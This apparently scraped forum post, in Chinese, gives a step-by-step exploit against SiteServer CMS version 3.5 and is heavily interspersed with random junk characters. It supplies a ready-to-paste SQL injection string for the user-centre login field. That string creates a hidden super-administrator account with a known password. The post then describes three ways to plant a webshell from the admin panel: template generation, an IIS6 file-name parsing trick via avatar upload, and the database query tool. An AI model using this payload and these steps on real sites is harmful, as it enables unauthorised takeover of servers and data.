经测试秒杀最新的3.5版- j3 U" G7 a" Y% k
5 \$ n' e# ?. jstieserver官网:www.siteserver.cn
* M) e) h% }) r# k, j0 a, l- G' z8 b
8 v& Y6 p8 ~6 m6 e, b5 r) a
7 ]3 {. |; |/ S, H: T- h0 J1 i T4 \: z/ F) v! p& z
EXP:
! z& A3 Z( E. O* B2 I' b, G, E3 m7 C# ~) \, [7 t. S
直接访问UserCenter/login.aspx: m; Q. n8 U6 u8 z
+ h) [4 q4 J$ C$ N' ]
: K( a2 U# O+ n: q- R! f5 x# j
6 [0 I! Q0 K9 P# b$ C- I! |用户名处输入:4 g2 D( T3 H# m" x+ I
- e: U. [( [- Q3 ]& e! w
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');-- _: g+ f) z* P! N' r2 b
4 Y* U' c" b4 @0 Q3 h6 T# C5 ]. a
" O# I/ Q/ W( K& `7 B1 n- [' @" W) d3 |4 ?
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
& A7 q) D. d( X* y! {) x
" g! R, K* p8 p8 z; T% z0 T 0 A' I; m, L5 s0 r( F( v* W
4 J/ N. z, y9 f( u
之后再访问后台SiteServer/login.aspx用插入的用户登陆
" F+ ?) G$ R7 v9 Y8 s% G$ B( D) {- B3 z$ p
# a& `) C/ Y) K2 ]7 W
6 O Z& {+ ?6 _8 @$ X) ^$ Z8 [
后台拿webshell的三种方法:: |2 A+ Z/ c1 X& e- Q! \: e% X; y; v( h! S
4 p8 M- M: X1 _1 q
一、/ v0 T' @0 {& G! l7 i
: B% c6 d" w: r" }" q& O. K
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx- k6 I: F; v4 v7 l
9 V7 ~3 _. v) a二、1 s# K3 N5 O) ~
' ^! ~' @$ q' J, s
成员权限-》添加用户-》用户名为:1.asp
* l) g" W$ o/ X+ T; ]6 Q; w3 m7 C5 i- [2 J$ g& r8 Z7 {
http://127.0.0.1/usercenter/
5 c, T7 B7 U0 K# W6 L
5 D0 B1 s7 E8 M9 a: n1 U0 w用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
( i. W" G C7 t1 V: H) R
7 N/ k U% ^4 [(ps:后台添加用户时不会验证是否含有非法字符)
5 S$ K! R) I# s* q, ]$ {- A5 J) b6 C3 |# d @ x
三、/ a! F" m! v8 }7 i* k2 i7 ?
& q5 ?7 Q6 K) ]4 j' M+ Z @" q系统工具-》实用工具-》机器参数查看
1 ]' u4 N" ^ y3 P0 J* ~" q可以看到数据库类型、名称,WEB路径- u2 q6 g" @( M+ K( d. u7 [
! [. u! u, N' v系统工具-》数据库工具-》SQL语句查询, J5 w5 K0 f7 ?4 }# a: }
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。- O6 q; z8 p1 G+ O! Z; q/ E: g
$ d% s: h$ Z* R6 e9 h; @ |